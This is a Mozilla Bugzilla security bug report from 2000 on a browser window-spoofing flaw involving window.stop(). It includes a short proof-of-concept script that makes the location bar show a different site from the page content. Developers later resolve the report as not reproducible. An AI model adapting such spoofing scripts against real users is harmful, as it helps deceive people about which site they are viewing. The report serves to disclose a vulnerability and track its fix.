Closed
Bug 26845
Opened 25 years ago
Closed 24 years ago
Spoofing windows using window.stop()
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
WORKSFORME
M17
People
(Reporter: norrisboyd, Assigned: security-bugs)
References
()
Details
Subject:
BUG: Spoofing windows using window.stop()
Date:
Mon, 07 Feb 2000 15:09:50 +0200
From:
Georgi Guninski <joro@nat.bg>
To:
Norris Boyd <norris@netscape.com>
Spoofing windows using window.stop()
It is possible to spoof windows due to setting the location bar rather
early (before the content area is displayed).
The code is:
--------------------------------------------------------------------
Spoofing windows.
Wait 5 seconds.
<SCRIPT>
a=window.open("http://www.mozilla.org","victim");
setTimeout("b=window.open('http://www.yahoo.com','victim');b.stop();",5000);
</SCRIPT>
Reporter | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Reporter | ||
Updated•25 years ago
|
Target Milestone: M16 → M17
Assignee | ||
Comment 3•25 years ago
|
||
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Assignee | ||
Comment 4•24 years ago
|
||
This doesn't seem to be happening now. The second page loads completely along
with its correct location bar, on both NT and Linux. Marking WORKSFORME. Cathy,
can you verify?
Status: NEW → RESOLVED
Closed: 24 years ago
Resolution: --- → WORKSFORME
Comment 6•24 years ago
|
||
Assigning QA to czhang
Comment 7•24 years ago
|
||
I could not reproduce the bug, it also works fine for me.
Status: RESOLVED → VERIFIED
Assignee | ||
Comment 8•24 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•